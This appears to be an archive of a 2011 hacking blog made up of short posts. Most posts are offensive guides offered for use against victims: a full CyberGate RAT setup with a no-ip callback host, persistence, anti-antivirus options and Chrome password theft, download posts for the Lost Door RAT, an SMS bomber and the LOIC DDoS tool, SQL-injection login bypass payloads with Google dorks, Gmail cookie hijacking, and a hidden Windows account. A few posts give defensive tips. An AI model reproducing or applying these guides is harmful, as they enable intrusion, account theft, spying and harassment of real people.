Tuesday, March 29, 2011

Finding A Spoofed Website With A Javascript



Lots of people think that Javascript is an inferior language but Javascript is an extremly powerful language and those people who think the other way they either don't know how to use it or are not familiar with it's capabilities, With javascript you can do lots of cool things such as edit any page, make an image fly etc, but it is a waste of time to spend your time on making images fly with javascripts or editing a page.
Anyways coming to the main topic, did you know that javascript can be used to detect if a page is a spoofed website or phishing website or a legit one, well if you don't know just paste the following code in to the address bar and a pop up will appear telling you whether the website is original or not
Here is the Javascript code:

javascript:alert("The actual URL is:\t\t" + location.protocol + "//" + location.hostname + "/" + "\nThe address URL is:\t\t" + location.href + "\n" + "\nIf the server names do not match, this may be a spoof.");

Friday, March 25, 2011

SMS -BOMBER


Features Include:
Full Feature List:
Custom SMTP Server (Make Sure You Type It Right)
Custom Carrier Gateway (If Your Victims Gateway Is Not In The Large List You May Find And Enter it Yourself)
Custom Number Of SMS To Send (Finally Have Where You Can Enter Any Amount To Send)
Save/Load Settings (Will Save Everything You Enter In The Fields, Restarting Your Computer Will Lose The Saved Settings)
Fixed XP GUI Issues
Stop Bombing At Any Time
Watch The Number Of SMS Sent In The Title Bar
No Longer Freezes While Sending
Added A Recent slave's Box Where You Can Select An Entry And Right-Click It To Bomb It Again Or Delete It From The List
Save/Load Recent Victims List

GMail Is The Default SMTP Server That Is Used Which Has A Limit On The Number That Can Be Sent
Has A Lot Of Carriers Already Pre-Entered For You.
SMS Looks Like

FRM: Senders Email
SUBJ: Subject
MSG: Message

What Is New In The Pro Version:
New GUI
Error Handling, For Example If There Was An Error Sending The Message It Will Ask You If You Want To Change The E-mail/Password You Are Using. This Is Just One Of The Many Error Handling I Have Added.
[Image: 1XB4F.png]

DOWNLOAD :


Thursday, March 24, 2011

Lost®Door J-Revolution v6


What is Lost Door?
Lost Door is a remote administration and spying tool for Microsoft Windows operating systems.

What operating systems are supported?

Windows 95/95B Windows 98/98SE 
Windows ME
Windows NT 4.0 Windows 2000 
Windows XP
windows Vista
windows Seven

What´s New

  * Sin GUI changed 
  * Webcam Stream fixed
  * Open website in the defaut browser added
  * Severals Minor bugs has been fixed
  * Kelogger updated it looks more clear
  * Upload option fixed ( Download from a website to a desired path)
  * Download & Run was added
  * Change icon removed 








Download:
http://www.multiupload.com/SLBQMUVS3D

Tuesday, March 22, 2011

how-to-setup-cybergate-rat





In This Tutorial You'll Learn Following:

Cybergate 1.07.5 Set Up - Download Cybergate RAT Here -- The AV Detection Is False Positives, Dont worry

Setting Up An No-IP

Spreading

Setting Up An No-IP Duc - Download Here!


 
Setting Up The No-IP & Client

1. Start Off By Going To; No-IP.com And Register. If You Have An Account There Already, Then Just Log In.

2. Once You've Logged In, Press "Add Host"
 

  

 3. Now It's Time To Choose Your Host Name!



Hostname: Your Host Name, EG:  

YourHostName.no-ip.biz
Host Type: DNS Host (A)

Dont Care About The Rest, Once You've Choosen Your Host Name, Press "Create Host" In The Lower Right Bottom.

  


 The Host Is Now Finished! Lets Move On To The No-IP Client.

1. The No-IP Client You Downloaded In The Beginning, Extract It To Your Desktop & Install It.

2. Now When You've Installed It, Open It Up & Log In With Your No-ip Username & Password.

3. When You're Logged In Press "Select Hosts" And Then Check That Little Box With Your Hostname.



-// Note: Always Have No-IP Open When You Have Cybergate Open!

There! Your No-IP Host & Your No-IP Duc Is Now Sat Up!

Setting Up Cybergate 1.07.5

1. Extract The Cybergate File You Downloaded In The Beginning To Your Desktop! Once Extracted, Open It & Wait 20 Seconds For The Agreement To Pass! :)

2. When It's Open, Press: Control Center -> Start.

3. Press: Control Center -> Options -> Select Listening Ports


 
  
4. Once You've Pressed The "Select Listening Ports" This Window Should Appear:


5.Firstly, Write "100" In That Little Box And Press The Blue Arrow. Then It Should Appear Under "Active Ports"

Active Ports: The Port You Will Forward Later!

Connections Limit: The Max Amount Of Victims You Can Have.

Connection PW: The Connection Password. Use "123456"

[V] Show Password: (Shows Password)

Once This Is Done, Press "Save"!

6. Now We'll Go To The: Control Center -> Build -> Create Server.



User: First, Press "New" And Name It To: "Plutonium". Once Done, Press "OK"

Now Just Double Click On "Plutonium" Or Press "Plutonium" And Then Press "Forward"

7. Now We're In The "Connection" Tab


First, Press "127.0.0.1 - 999" And Then Press Delete.
Now Press "Add" And Write Your Hostname In It + :100.
Like This: 


YourHostName.No-ip.biz:100

 Change The Identification To: Cyber
Change The PW To: 123456

**Note, If You Want To Try The Server On Yourself, Then Delete Both:

- 127.0.0.1:999
- YourHostName.No-ip.biz

And Replace Them With; 127.0.0.1:100 Since 127.0.0.1 Means "Local Computer & LAN Internet"

Make The DNS/HostName Server First Though! :)

DNS: Your Host Name, EG: 

YourHostName.no-ip.biz

  Port: The Port You Will Forward Later.
Identification: The slave Name
PW: The Password You Wrote In The Options, "123456"

8. Once You're Done With Theese, You'll Move On To The "Installation" Tab.

9. Have The Same Settings As I Do, And Follow The Instructions In The Image!

--//--//--//--//--//--//

Install Directory: Where The Server Installs, 

%System%
%Windows%
%Root%
%Program Files%
%Other%

Use The "System"! :).

Boot: This Is The "Startup" Option. Have Everything Checked & Press "Random" 5 Times And It Will Startup On Your slave Everytime They Start Their Computer!

Directory: Where The Virus Folder Installs
File Name: What The File Will Be Inside The Folder.

Inject Into. What Process It Injects into, Use Default Browser!

[V] Persistance: Keeps Trying To Inject Until Succed.
[V] Hide File: Hides The File, (Not FUD Though!)
[V] CCD: Changes The Creation Date From 16th July To 4 September 2005.

Mutex: Mutex Of The Server, Just Press Random A Couple Of Times!

There We Go, You've Now Completed The "Installation" Tab!

--/ Skip The Message & Keylogger Since They Are Pre-Set Already!

10. You Should Now Have Trumbled Into The "Antis" Tab, Have Everything Checked! (Except SANDBOXIE If You Are Gonna TRY IT ON YOURSELF!)


Ok, The Final Tab.. "Creation Of The Server". Have Every Setting As Me!

[V] Use Icon: Yes
[V] Delayed Execution: (How Many Seconds It Takes Until Your Server Injects And They Pop Up In Your RAT)
[V] Google Chrome PW: Yes, Steals Their GC Passwords :)
[X] Bind Files: No, Get An Real Binder Instead! (Have Your Server Crypted Though First!)
[X] Compress With UPX: Makes The Server Smaller But More AV's Detects It!

There! Your RAT Is Now Fully Sat Up.

Saturday, March 19, 2011

Gaining Auth Bypass On an Admin Account.



Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
here is the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

Now what to do once we get to our site.
the site should look something like this :

welcome to xxxxxxxxxx administrator panel
username :
password :

so what we do here is in the username we always type "Admin"
and for our password we type our sql injection

here is a list of sql injections

' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 -- 

Thursday, March 17, 2011

Windows Password Hack

his is a short and effective way to hack the  Windows Login password without knowing the previous password. This trick works only in case you are already logged into Windows and you have all the administrative privileges. So here we go:
1.Open Command prompt
START>RUN
password Recovery

Type in; cmd

2. In command prompt just type in “net user” as shown below:

3.After doing the above, the command will give you all the account’s names>
password recovery
4. So the next thing you do is just type in: net user YourUser account’s namesthat u want 2 Hack
then press  shift +8=*
password recovery
…now its just ask u r new  password and enter the pswd again

enjoy the hacking 

Wednesday, March 16, 2011

How to hack an Email account using Cookie Stealing.



If you are a newbie and don't know about cookie, then for your information, Cookie is a piece of text stored on user computer by websites visited by the user. This stored cookie is used by webserver to identify and authenticate the user. So, if you steal this cookie (which is stored in victim browser) and inject this stealed cookie in your browser, you can imitate victim identity to webserver and enter his Email account easily. This is called Session Hijacking. Thus, you can easily hack Email account using such Cookie stealing hacks.

Tools needed for Cookie stealing attack:


Cookie stealing attack requires two types of tools:
1. Cookie capturing tool
2. Cookie injecting/editing tool

1. Cookie capturing tool:
Suppose, you are running your computer on a LAN. The victim too runs on same LAN. Then, you can use Cookie capturing tool to sniff all the packets to and from victim computer. Some of the packets contain cookie information. These packets can be decoded using Cookie capturing tool and you can easily obtain cookie information necessary to hack Email account. Wireshark and HTTP Debugger Pro softwares can be used to capture cookies.

Update: Check out my Wireshark tutorial for more information on cookie capturing tool.

2. Cookie injecting/editing tool:

Now, once you have successfully captured your victim cookies, you have inject those cookies in your browser. This job is done using Cookie injecting tool. Also, in certain cases after injection, you need to edit cookies which can be done by Cookie editing tool. This cookie injection/editing can be done using simple Firefox addons Add N Edit Cookies and Greasemonkey scripts. I will write more on these two tools in my future articles.

Update: Check out my article How to hack Gmail account by Cookie stealing for more information on Cookie injecting tool.

Drawbacks of Cookie Stealing:


Cookie Stealing is neglected because it has some serious drawbacks:

1. Cookie has an expiry time i.e. after certain trigger cookie expires and you cannot use it to hijack victim session. Cookie expiry is implemented in two ways:

a. By assigning specific timestamp(helpful for us).

b. By checking for triggers like user exiting from webbrowser. So, in such cases, whenever user exits from his browser, his cookie expires and our captured cookie becomes useless.

2. Cookie stealing becomes useless in SSL encrypted environment i.e. for https (Secure HTTP) links. But, most Email accounts and social networking sites rarely use https unless vicitm has manually set https as mandatory connection type.

3. Also, most cookies expire once victim hits on LogOut button. So, you have to implement this Cookie stealing hack while user is logged in. But, I think this is not such a serious drawback because most of us have the habit of checking "Remember Me". So, very few people actually log out of their accounts on their PCs.

Enjoy Cookie stealing trick to hack Email account...

Tuesday, March 15, 2011

Create Hidden Account In XP


Since we are going to do all the Editing in Window   Registry it is Recommended to Back Up the Registry before going Further.


After you have Backed up your registry follow the Steps to Create your Hidden Account:
First Goto Start -> Run -> Type regedit -> Enter
In the Left Menu goto,

HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\Cu rrentVersion\Winlogon\SpecialAccounts\UserList

In the Right pane, Right click -> New -> String Value
Right click on the new String Value and click Rename
Type the Name of the Account you want to hide.
Hit Enter then Right click on the String Value again and Change value to 0 which hides it. If you want it to be Visible to all Enter the Value 1.
Now Save and Exit the Registry and Logoff.
Goto welcome screen and Hit ctrl+alt+del twice to bring up Logon prompt
Type hidden Accounts name and password

Monday, March 14, 2011

How to Protect Your Websites & BLOGS From Hackers?



It’s a nightmare scenario. You go to your website only to find a nasty message from a hacker bragging about hacking your site. And nothing else. As far as you can tell your content is gone and you can’t even find a way to log into your Website, WordPress OR Blogspot dashboard.

Would your business survive your website being shut down, even temporarily?

Have You Really Been Hacked?

A lot of times people come to me saying, “My site’s been hacked,” when it really hasn’t. With Blog sometimes plugin conflicts can cause issues that seem to the user like a hacker has messed with something. This is most common when upgrading to a new version of blogging services if a plugin hasn’t been made compatible with the new version yet.

While that can cause your site to crash, it’s not caused by hackers.

Not only that, but most of the sites I’ve seen that have been hacked weren’t just taken down by them. Most of the malicious hacks I’ve seen involved injecting some code into the site, usually with the end goal to redirect site traffic to some other website.

The Symptoms

Without going into the details, it case was a little different. the  site actually showed an all white screen with an error message along the lines of a plugin conflict and the hacker just wanted to crash her site. Turns out he was into stealing something else.
 
Here are some things you can do to minimize the chances you’ll end up getting hacked and maximize the chances to fully recover quickly should your site crash (for whatever reason).

1. Use Strong Passwords.

Make your passwords not only hard to guess, but make them more difficult for sophisticated hackers to break as well. Randomly mix in special characters (found on the number keys with the shift button) as well as numbers and upper and lower case letters. Here’s what Wikipedia says about password strength.

Almost all Websites & blogging services cPanel will tell you how strong your password is. Stronger passwords offer better protection.

It also makes them harder to type in. That’s why I use 1Password to manage my passwords. I can use really strong passwords and I don’t have to remember them or type them in. 1Password will auto fill web forms for me. It’s the best of both worlds: good security & user friendly.

2. Keep Your BLOG/Website Updated.

One of the most common ways websites get hacked is because their owners don’t keep their software up to date. What happens is that older versions of WordPress can have know security weaknesses. These weaknesses are fixed by newer releases of the software.

But if you don’t update your software, you leave yourself exposed.

This also holds true with plugins and themes. Besides, the newer versions of websites make keeping everything up to date remarkably easy. There’s not much of an excuse to keep you from updating things.

3. Backup Regularly and Often.

A good backup can cover for a ton of other issues by making it possible to revert back to how things were before your site crashed. You need to back up your
  • Database
  • Theme Files
  • Plugins
  • Media Uploads
  • But the point is backup early and backup often!
Bottom Line

I don’t believe any site is completely “hack proof.” A determined hacker with enough resources can break into most anything. Just watch an episode of NCIS!

But if you do these three things you will greatly reduce your risk of being hacked and make it much easier to recover if you do run into a problem.

Sunday, March 13, 2011

see the password behind star

Hello guys,


I am going to show you in a short tutorial how to read out a password of a web browser.

Example:

http://www.gmail.com

Username: example@gmail.com
Password: **

What's my password?

Alright, now you could read out the **-stuff with a simple javascript code.


Friday, March 11, 2011

How to hack a Gmail account:





Lets start with the hack. Gmail usually stores the session authentication information in cookie named "GX". This cookie is used by Gmail to verify and authenticate the user. Thus, the user will be given access to Gmail account depending on the cookie he has. So, if you have access to victim account's cookie and if you inject this cookie in your browser, Gmail will give you the access to victim account. Thus, you will be able to hack Gmail account.


Steps to hack Gmail account:


There are two ways of stealing cookies of victim:
1. Physical access to victim computer
2. Victim computer in same network (LAN) as the hacker.

A hacker can use Wireshark or HTTP Debugger Pro to sniff and steal cookies when victim is in hacker's network. I am gonna cover the first method here and will post on Wireshark in my coming articles. So, now, we will assume that hacker has physical access to victim computer. Lets start.

1. Once you have access to victim computer, install Cookie Editor firefox addon on victim computer.

2. Now, go to Tools -> Cookie Editor to see something like:



3. Enter ".google.com" (without quotes) in text box and hit on "Filter/Refresh".

4. Now, look for cookie with name "GX". Select that cookie and hit on "Edit".

5. You will get this popup box showing all information about that cookie. Now, simply copy all the text in box adjacent to "Content". That's it guys, we have successfully obtained victim cookie and now, need to inject this cookie in our browser.

6. Now, go to your browser and install Cookie Editor addon. If you have logged in to your Gmail account, logout of your Gmail account. Go to Tools -> Cookie Editor. Enter ".google.com" in text box and hit on "Filter/Refresh". Now, search for a cookie named "GX". Select this cookie and hit on Edit. In textbox next to Content, enter the victim cookie obtained in Step 5.


Select "Any type of Connection". Hit on Save.

7. Now, go to gmail.com and you will find yourself logged in to victim's Gmail account. Thus, you are able to hack a Gmail account using Cookie stealing.

Note: If you want to try this Cookie stealing hack on your own computer, use two different browsers like Firefox and Flock. Consider that Flock is victim's browser and Firefox is hacker's browser and simply copy-paste the cookie in Flock to Firefox. You will get the results. Refer to above steps for more help.

So friends, I hope now you are now able to
Enjoy Cookie stealing to hack Gmail account...

Wednesday, March 9, 2011

6 Tips to Avoid Facebook Viruses and Spam Messages


Facebook, the biggest social network with 500 million users, provides an interface to hit an unsuspecting crowd with malware and viruses. These viruses aren’t very difficult to detect  if you are cautious enough. These Facebook viruses appear on your wall in forms of a bizarre or eye-catching stories and videos and once the user has clicked/liked the link, it is already late. The next step will be getting rid of your Facebook virus which is a time-consuming  process.  Its better to avoid spam messages and trojan viruses in the first place.

How to avoid it?

1. Think before you Act. Viruses on Facebook are sneaky. The hackers and cybercriminals who want your information know that Facebook users will often click on an interesting post without a moment’s thought. If a post sounds a bit over-the-top like a headline out of a tabloid, this is your first warning sign.
2. Try to avoid Links and videos with Catchy words like  “funniest ever,” “most hilarious video on Facebook,” or “you’ve got to see this.” Do some keyword research to see if the post in question comes up in a search engine with information about a current virus or trojan.
3. Check the poster of the Suspicious content. If you receive a message from someone you do not know, this is an obvious red flag. Facebook video viruses also tend to pop up in your news feed or on your wall from friends you haven’t talked to in a while. Unfortunately, it’s likely this friend has already fallen victim to the latest virus on Facebook. After clicking on the story themselves, the message was sent out to all of their friends as well.
4 Avoid messages that have been posted by multiple users as the virus spreads among your friends who were not so cautious. If a link with title such as “Sexiest video ever” shows up all over your feed from all kinds of people (perhaps friends you would not expect to make such a post), this is another warning sign. Similar direct messages are a likely variant of the notorious Facebook Koobface virus which has used this approach in the past.
5. Do not fall for the “typical” money-transfer schemes. Chat messages from friends needing funds will usually sound suspicious. Everything can’t be screened before posting, so money transfer scams and hoax applications still find their way on to Facebook. You should also avoid applications that claim to do a full “Error check” or fix security problems related to your profile.
6. Update your anti-virus software frequently. If you do accidentally click on a post before realizing it is a hoax, do not click on any further links or downloads. If it’s too late and you have already been infected, the Facebook virus removal process may be effortless if you have a good anti-virus program to catch the virus, trojan or other malware early on.

What’s Next?

These were few important tips to safeguard your facebook account but your job isn’t done yet. Once you have detected that the link/post on your facebook wall is Malicious you should Mark it as SPAM so that the facebook support will stop it from spreading further and infecting other users.
If you have ever fallen victim of any such Malicious Scheme, please share your experience with all the users  in form of comments so that others don’t fall victim of it.

Tuesday, March 8, 2011

Low Orbit Ion Cannon - An open source network stress tool (Ddos) !

 
Its an ddos tool which helps to attack an server by sending 
the more numbers of packets you can download from here 

Download Here